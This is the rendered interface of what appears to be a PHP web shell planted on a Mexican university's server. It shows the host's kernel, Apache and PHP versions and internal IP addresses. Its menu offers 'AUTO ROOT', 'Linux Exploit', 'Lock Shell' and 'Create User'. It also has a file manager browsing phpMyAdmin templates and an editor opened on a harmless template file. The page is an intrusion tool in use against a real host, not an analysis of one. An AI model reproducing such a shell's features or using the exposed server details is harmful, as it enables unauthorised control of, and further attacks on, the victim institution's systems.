Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
htdocs /
phpMyAdmin /
templates /
[ HOME SHELL ]
Name
Size
Permission
Action
columns_definitions
[ DIR ]
drwxrwxr-x
components
[ DIR ]
drwxrwxr-x
console
[ DIR ]
drwxrwxr-x
database
[ DIR ]
drwxrwxr-x
error
[ DIR ]
drwxrwxr-x
export
[ DIR ]
drwxrwxr-x
javascript
[ DIR ]
drwxrwxr-x
list
[ DIR ]
drwxrwxr-x
navigation
[ DIR ]
drwxrwxr-x
privileges
[ DIR ]
drwxrwxr-x
server
[ DIR ]
drwxrwxr-x
table
[ DIR ]
drwxrwxr-x
test
[ DIR ]
drwxrwxr-x
checkbox.phtml
575
B
-rwxrwxr-x
div_for_slider_effect.phtml
710
B
-rwxrwxr-x
filter.phtml
324
B
-rwxrwxr-x
header_location.phtml
909
B
-rwxrwxr-x
prefs_autoload.phtml
721
B
-rwxrwxr-x
preview_sql.phtml
382
B
-rwxrwxr-x
secondary_tabs.phtml
188
B
-rwxrwxr-x
select_all.phtml
458
B
-rwxrwxr-x
select_lang.phtml
973
B
-rwxrwxr-x
startAndNumberOfRowsPanel.phtml
892
B
-rwxrwxr-x
toggle_button.phtml
1.28
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : startAndNumberOfRowsPanel.phtml
<fieldset> <div> <label for="pos"><?= __('Start row:'); ?></label> <input type="number" name="pos" min="0" required="required" <?php if ($unlim_num_rows > 0) : ?> max="<?= ($unlim_num_rows - 1); ?>" <?php endif; ?> value="<?= htmlspecialchars($pos); ?>" /> <label for="session_max_rows"><?= __('Number of rows:'); ?></label> <input type="number" name="session_max_rows" min="1" value="<?= htmlspecialchars($rows); ?>" required="required" /> <input type="submit" name="submit" class="Go" value="<?= __('Go'); ?>" /> <input type="hidden" name="sql_query" value="<?= htmlspecialchars($sql_query); ?>" /> <input type="hidden" name="unlim_num_rows" value="<?= htmlspecialchars($unlim_num_rows); ?>" /> </div> </fieldset>
Close